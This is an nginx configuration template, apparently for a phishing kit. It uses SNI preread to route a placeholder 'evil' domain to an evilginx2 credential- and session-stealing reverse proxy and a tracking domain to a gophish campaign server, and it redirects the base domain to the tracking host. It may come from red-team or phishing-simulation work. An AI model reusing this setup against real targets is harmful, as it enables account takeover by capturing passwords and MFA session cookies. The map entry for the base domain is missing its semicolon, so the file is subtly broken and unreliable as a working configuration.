events {
    worker_connections 1024;
}

stream {
    map $ssl_preread_server_name $backend_name {
        ${EVIL_DOMAIN} evilginx_backend;
        ${TRACK_DOMAIN} gophish_backend;
        ${BASE_DOMAIN} nginx_http_backend
        default gophish_backend;
    }

    upstream evilginx_backend {
        server evilginx2:443;
    }

    upstream gophish_backend {
        server gophish:443;
    }

    upstream nginx_http_backend {
        server 127.0.0.1:8080;
    }

    server {
        listen 443;
        proxy_pass $backend_name;
        ssl_preread on;
    }
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    server {
        listen 8080 ssl;
        server_name ${BASE_DOMAIN};

        ssl_certificate /etc/nginx/certs/fullchain.pem;
        ssl_certificate_key /etc/nginx/certs/privkey.pem;

        location ^~ /.well-known/mta-sts.txt {
            alias /var/www/html/mta-sts.txt;
        }

        location / {
            return 301 https://${TRACK_DOMAIN}$request_uri;
        }
    }
}